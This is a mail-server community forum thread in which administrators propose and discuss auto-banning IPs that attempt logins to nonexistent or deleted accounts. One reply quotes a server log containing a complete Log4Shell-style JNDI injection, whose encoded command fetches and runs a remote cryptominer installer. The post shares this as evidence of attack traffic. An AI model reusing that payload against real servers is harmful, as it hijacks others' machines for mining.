Back to Community Threads
8
Suggestion : Instant SMTP Block on Failed Authentication of No User
Idea shared by Curtis Kropar www.HawaiianHope.org - 3/2/2017 at 5:00 PM
Under Consideration
In our server logs I am seeing thousands of "Authentication failed"  But these are not for our users that are forgetting their passwords, these are people trying to log in with accounts that do not even exist, or accounts that did exist at one point, but have since been deleted. The same IP addresses are trying dozens of random user names to try to get one that works. They try one or 2, drop connection, then maybe several hours later try again, or try from a different IP address.  This tactic is bypassing our brute force filter - which I thought i set pretty aggressive at : 2 failures in 240 minutes, to ban for 3 months.
 
What I would like to see is.  If an IP address tries to authenticate with a user account that does not exist, It is immediately banned.

www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !

20 Replies

Reply to Thread
0
Hear Hear
Kendra Support http://www.kendra.com support@kendra.com 425-397-7911 Junk Email filtered ISP
0
Bump.
Any feedback on this ? Was this ever implemented ?
www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !
0
Employee Replied
9/25/2019 at 4:01 PM
Employee Post
Curtis,

This was also referenced in this thread:

It has been submitted as a feature request.
0

HI !

Was this ever implemented ?
www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !
1
Bump, 7 years old.
www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !
0
Potential downside is every time someone makes a typo configuring a new client you’ll be getting a call. 
0
But they usually dont...
1
Then put a limit on it (5 times) before a block occurs....
0
Ron, More specifically, I am looking at attacks on user accounts and domains that may have existed but no longer exist.  We have several domains where the org has migrated over to a completely new domain name, still on our same server, but now they use a different domain. and dozens of accounts across multiple domains that the user is gone and not coming back. Hackers out there may have their old credentials, but at minimum, they have their email accounts. What is happening is attacks are trying to log in as those accounts that are no longer there and on the old domain that is no longer in use. It is sometimes hundreds per day.

Maybe what would be nice is a flag on a user account or domain - that "if this account tries to log in, ban the IP"
www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !
0
Failed logins (10 ish) and the originating IP gets banned....
0
Brian, As I posted in my original, they are bypassing this. Apparently they figured out I block on 2 failures in 240 minutes. So they will try once, then try again from a different IP address, then come back about 6 hours later and try again from a previous IP address, or try to log in to a different email account, not the same one. I am getting tons of one hit wonders, and not much banning happening.
www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !
1
Ok, I just looked at it. To give you an example - for a single account that no longer exists, I have 1,480 attempts to authenticate this particular account in the last 28 days, from 978 unique IP Addresses.
And that is just one of the accounts that we have issues with out of dozens.
www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !
0
@Curtis

You can do a rule like this:



This will BLOCK a user E-MAIL (per email address)
Gabriele Maoret - Head of SysAdmins and CISO at SERSIS Currently manages 6 SmarterMail installations (1 in the cloud for SERSIS which provides services to a few hundred third-party email domains + 5 on-premise for customers who prefer to have their mail server in-house)
0
We need the IP blocked... not the email address
0
Unfortunately, it's very difficult to write a rule that blocks IPs that try to login 2 times a day (or less..) without having too many false positives...

I really don't know haw can that be done... I don't know any system that can do that, but if you find one (free or paid) please tell us so we can give it a try...
Gabriele Maoret - Head of SysAdmins and CISO at SERSIS Currently manages 6 SmarterMail installations (1 in the cloud for SERSIS which provides services to a few hundred third-party email domains + 5 on-premise for customers who prefer to have their mail server in-house)
0
Mailenabel has it built in.

You can define the amount of failed logins and then the IP gets banned.
1
You can do that even in SmarterMail:


The problem is that it is annoying to ban an IP because it failed to log in 1 time every 15-20 days (you can set TIME FRAME to 21600 minutes if you want), because this could very likely be a false positive...

However, if you want, in SmarterMail you can set multiple rules with different parameters for IP Banning, so you can detect different behaviors of different attackers, for example a rule that blocks like mine above, and another that blocks if an IP fails 2 times in 30 days...
Gabriele Maoret - Head of SysAdmins and CISO at SERSIS Currently manages 6 SmarterMail installations (1 in the cloud for SERSIS which provides services to a few hundred third-party email domains + 5 on-premise for customers who prefer to have their mail server in-house)
0
Allready have that in place Gabriele :) Thanks.
1
I would suggest more rules:

1.  blacklist if an IP try to authenticate on port 25, to us port 25 is for server to server only.
2.  blacklist if an IP summit `Unrecognized authentication type`
3.  blacklist if an IP summit bad command 
4.  drop connection of ip from disallowed country of defined. or add it to blacklist.

here is our server's log, apparently is from a bad bot. most incoming traffic now is below types. 

[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] rsp: 500 command unrecognized
[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] cmd: Bearer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//85.31.47.139:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')
[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] Closing transmission channel: too many bad commands
[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] rsp: 421 Too many bad commands, closing transmission channel
0
Gabriele, I think really for my suggestion to work properly, SmarterMail would need to have an option where we could check a box and, flag an account or domain, or type in a domain or account to target it.. Again, I am primarily wanting to target accounts on our server that USED TO BE legit, but no longer exist. because the same IP's that are blasting away trying to log into them are also trying to log into our legitimate accounts as well. So If we can identify and block the ones going after accounts and domains that no longer exist, then it will drastically cut down on other attacks as well.
www.HawaiianHope.org - Providing technology services to non profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, We have refurbished over 11,000 Computers !
Back to Community Threads

Reply to Thread

Enter the verification text

Related Knowledge Base Articles

Recommended SPAM SettingsSmarterMail > Antispam and Antivirus
SmarterMail for Linux – SSL/TLS & Certificate ReferenceSmarterMail > Server Configuration and Management
Set up Autodiscover for SmarterMailSmarterMail > Installation and Configuration
Cannot Send Email MessagesSmarterMail > Troubleshooting
Find a Compromised AccountSmarterMail > Troubleshooting